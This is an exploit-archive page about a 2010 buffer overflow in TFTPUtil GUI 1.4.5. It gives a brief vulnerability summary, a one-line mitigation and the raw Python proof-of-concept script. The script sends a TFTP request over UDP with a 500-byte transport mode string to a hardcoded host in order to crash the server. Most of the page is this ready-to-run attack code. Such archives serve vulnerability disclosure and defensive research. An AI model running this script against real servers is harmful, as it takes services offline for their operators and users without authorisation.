header-logo
Suggest Exploit
vendor:
TFTPUtil
by:
Jeremiah Talamantes
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: TFTPUtil
Affected Version From: 1.4.5
Affected Version To: 1.4.5
Patch Exists: YES
Related CWE: N/A
CPE: tftputil:tftputil_gui
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, SP2 (En)
2010

TFTPGUI Long Transport Mode Overflow

TFTPGUI is vulnerable to a buffer overflow when sending an overly long transport mode string. This can be exploited to cause a denial of service condition by crashing the application.

Mitigation:

Ensure that the application is updated to the latest version and that all input is validated and sanitized.
Source

Exploit-DB raw data:

# Exploit Title: TFTPGUI Long Transport Mode Overflow
# Date: 5/1/2010
# Author: Jeremiah Talamantes
# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
# Version: 1.4.5
# Tested on: Windows XP, SP2 (En)
# CVE : N/A

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TFTPGUI Long Transport Mode Overflow            ##"
print "##                        Version 1.4.5                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Change these values to suit your needs
host = '192.168.1.108'
port = 69
 
try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "Error: unable to connect."
   sys.exit(1)
 
# Creating the overly long transport mode string 
fn = "A"
md = "A" * 500
stuff = "\x00\x02" + fn + "\0" + md + "\0"

# Send data
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."

# End

Navigation

Suggest Exploit

Services By CQR